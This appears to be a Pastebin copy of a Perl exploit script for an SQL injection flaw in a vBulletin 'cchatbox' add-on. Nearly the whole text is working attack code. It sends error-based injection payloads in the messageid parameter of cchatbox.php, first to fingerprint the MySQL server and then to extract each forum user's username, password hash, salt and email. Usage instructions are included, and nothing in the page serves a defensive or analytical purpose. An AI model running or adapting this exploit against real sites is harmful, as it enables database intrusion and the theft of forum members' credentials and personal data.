API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 22nd, 2014
202
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.47 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3. $ua = LWP::UserAgent->new;
  4. $ua->agent("MyApp/0.1 ");
  5. print "##################################\n";
  6. print "############ EXPLOIT #############\n";
  7. print "##################################\n";
  8. print "## Portal: cchatbox ##\n";
  9. print "## Bug: SQLI ##\n";
  10. print "## Author: DSecurity ##\n";
  11. print "## Coder: vv0lll ##\n";
  12. print "##################################\n";
  13.  
  14. print "Use: exploit.pl address number_user sleeptime\n";
  15. print "Example: exploit.pl http://localhost/vbb 10 10\n";
  16. if(@ARGV < 2) {exit;}
  17. print "\n\n================================================\n";
  18. #Foot print
  19. print v_request('MySQL version: ','@@version');
  20. print v_request('Data dir: ','@@datadir');
  21. print v_request('User: ','user()');
  22. print v_request('Database: ','database()');
  23.  
  24. #Get user
  25. for($i=1;$i<=$ARGV[1];$i++){
  26. print "-----------------------------------------\n";
  27. print $id = v_request('ID: ','userid','user','1',$i-1);
  28. if($id =~ /(ID:)\s(.*)/){
  29. print v_request('Group: ','usergroupid','user','userid='.$2);
  30. print v_request('Username: ','username','user','userid='.$2);
  31. print v_request('Password: ','password','user','userid='.$2);
  32. print v_request('Salt: ','salt','user','userid='.$2);
  33. print v_request('Email: ','email','user','userid='.$2);
  34. }
  35.  
  36. }
  37.  
  38. print $ARVG[0];
  39. sub v_request{
  40. #Declare
  41. $print = $_[0];
  42. $select = $_[1];
  43. $from = $_[2];
  44. $where = $_[3];
  45. $limit = $_[4];
  46. $sleep = $ARGV[2];
  47. if ($from eq '') {$from = 'information_schema.tables';}
  48. if ($where eq '') {$where = '1';}
  49. if ($limit eq '') {$limit = '0';}
  50. if ($sleep eq '') {$sleep = '10';}
  51.  
  52. # Create a request
  53. my $req = HTTP::Request->new(POST => $ARGV[0].'/cchatbox.php');
  54. $req->content_type('application/x-www-form-urlencoded');
  55. $req->content('do=edit&messageid=0 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select '.$select.' from '.$from.' WHERE '.$where.' limit '.$limit.',1),FLOOR(RAND(1)*3))x FROM information_schema.tables GROUP BY x)a)');
  56.  
  57. # Pass request to the user agent and get a response back
  58. my $res = $ua->request($req);
  59. #print $res->content;
  60. if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
  61. {$test = $3};
  62. sleep($sleep);
  63. return $print.$test."\n";
  64. }
  65.  
  66.  
  67.  
  68. # E363C66E681CEC29 1337day.com [2014-09-23] 00934B86305D2D47 #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!